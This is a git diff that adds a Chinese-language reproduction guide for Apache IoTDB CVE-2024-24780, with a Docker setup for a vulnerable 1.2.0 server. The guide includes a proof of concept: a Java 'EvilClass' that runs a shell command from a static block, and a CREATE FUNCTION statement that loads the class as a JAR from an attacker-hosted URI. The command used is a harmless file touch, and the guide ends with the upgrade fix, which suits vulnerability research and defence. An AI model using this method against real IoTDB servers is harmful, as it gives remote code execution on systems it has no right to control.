diff --git a/base/iotdb/1.2.0/docker-compose.yml b/base/iotdb/1.2.0/docker-compose.yml new file mode 100644 index 0000000..dfd2eeb --- /dev/null +++ b/base/iotdb/1.2.0/docker-compose.yml @@ -0,0 +1,8 @@ +services: + iotdb: + image: apache/iotdb:1.2.0-standalone + container_name: iotdb + ports: + - "6667:6667" + - "31999:31999" + - "8181:8181" \ No newline at end of file diff --git a/数据库漏洞/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780.md b/数据库漏洞/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780.md new file mode 100644 index 0000000..da3b3ca --- /dev/null +++ b/数据库漏洞/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780.md @@ -0,0 +1,107 @@ +# Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780 + +## 漏洞描述 + +Apache IoTDB(物联网数据库)是支持收集、存储、管理与分析物联网时序数据的软件系统。CVE-2024-24780 中,攻击者在具有创建 UDF 的权限下可构造恶意请求造成远程代码执行,控制服务器。 + +IoTDB 支持两种方式加载 UDF(用户自定义函数): + +- 手动部署:将包含 UDF 的 JAR 包放置于每个节点的指定目录(如 `ext/udf)`。 +- URI 自动加载:在注册 UDF 时指定远程 URI,IoTDB 会自动从该地址下载 JAR 包并分发到集群中的各个节点。 + +攻击者可以通过 URI 自动加载的方式,指定一个恶意远程 URI。IoTDB 将从恶意远程 URI 加载包含恶意代码的 JAR 包,并分发到集群中的各个节点执行。 + +参考链接: + +- https://iotdb.apache.org/ +- http://www.openwall.com/lists/oss-security/2025/05/14/2 +- https://lists.apache.org/thread/xphtm98v3zsk9vlpfh481m1ry2ctxvmj + +## 漏洞影响 + +``` +1.0.0 <= Apache IoTDB < 1.3.4 +``` + +## 环境搭建 + +### 启动 IoTDB + +docker-compose.yml + +``` +services: + iotdb: + image: apache/iotdb:1.2.0-standalone + container_name: iotdb + ports: + - "6667:6667" + - "31999:31999" + - "8181:8181" +``` + +执行如下命令启动一个 Apache IoTDB 1.2.0 版本的服务器: + +``` +docker-compose up -d +``` + +查看启动情况: + +``` +docker ps +``` + +![](Public/Awesome-POC/数据库漏洞/images/Apache%20IoTDB%20UDF%20远程代码执行漏洞%20CVE-2024-24780/image-20250519141116383.png) + +### 安装 Cli 命令行 + +下载 [apache-iotdb-1.2.0-cli-bin.zip](https://archive.apache.org/dist/iotdb/1.2.0/): + +``` +wget https://archive.apache.org/dist/iotdb/1.2.0/apache-iotdb-1.2.0-cli-bin.zip +unzip apache-iotdb-1.2.0-cli-bin.zip +``` + +启动 Cli,命令行客户端是交互式的,如果一切就绪,我们可以看到欢迎标志和声明: + +``` +cd apache-iotdb-1.2.0-cli-bin/ +sbin/start-cli.sh -h your-ip -p 6667 -u root -pw root +``` + +![](Public/Awesome-POC/数据库漏洞/images/Apache%20IoTDB%20UDF%20远程代码执行漏洞%20CVE-2024-24780/image-20250519141502540.png) + +## 漏洞复现 + +编写类 `org.example.EvilClass`,将其编译为 `poc.jar`,将编译好的 jar 文件上传到 vps 进行托管。此处我们的恶意类中执行的命令是 `touch /tmp/awesome_poc`: + +```java +package org.example; + +public class EvilClass { + static { + try { + Runtime.getRuntime().exec("touch /tmp/awesome_poc"); + } catch (Exception e) { + e.printStackTrace(); + } + } +} +``` + +通过 URI 自动加载,在 IoTDB 中注册恶意 UDF: + +``` +CREATE FUNCTION evilFunc AS 'org.example.EvilClass' USING URI 'http:///poc.jar'; +``` + +![](Public/Awesome-POC/数据库漏洞/images/Apache%20IoTDB%20UDF%20远程代码执行漏洞%20CVE-2024-24780/image-20250519142349138.png) + +IoTDB 会从我们的 vps 下载 `poc.jar`,加载恶意类并执行命令 。可以看到,`touch /tmp/awesome_poc` 已经执行成功: + +![](Public/Awesome-POC/数据库漏洞/images/Apache%20IoTDB%20UDF%20远程代码执行漏洞%20CVE-2024-24780/image-20250519142545665.png) + +## 漏洞修复 + +升级至 1.3.4 及以上版本。 diff --git a/数据库漏洞/images/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780/image-20250519141116383.png b/数据库漏洞/images/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780/image-20250519141116383.png new file mode 100644 index 0000000..139afc4 Binary files /dev/null and b/数据库漏洞/images/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780/image-20250519141116383.png differ diff --git a/数据库漏洞/images/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780/image-20250519141502540.png b/数据库漏洞/images/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780/image-20250519141502540.png new file mode 100644 index 0000000..61c83ef Binary files /dev/null and b/数据库漏洞/images/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780/image-20250519141502540.png differ diff --git a/数据库漏洞/images/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780/image-20250519142349138.png b/数据库漏洞/images/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780/image-20250519142349138.png new file mode 100644 index 0000000..b17eda6 Binary files /dev/null and b/数据库漏洞/images/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780/image-20250519142349138.png differ diff --git a/数据库漏洞/images/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780/image-20250519142545665.png b/数据库漏洞/images/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780/image-20250519142545665.png new file mode 100644 index 0000000..30c7229 Binary files /dev/null and b/数据库漏洞/images/Apache IoTDB UDF 远程代码执行漏洞 CVE-2024-24780/image-20250519142545665.png differ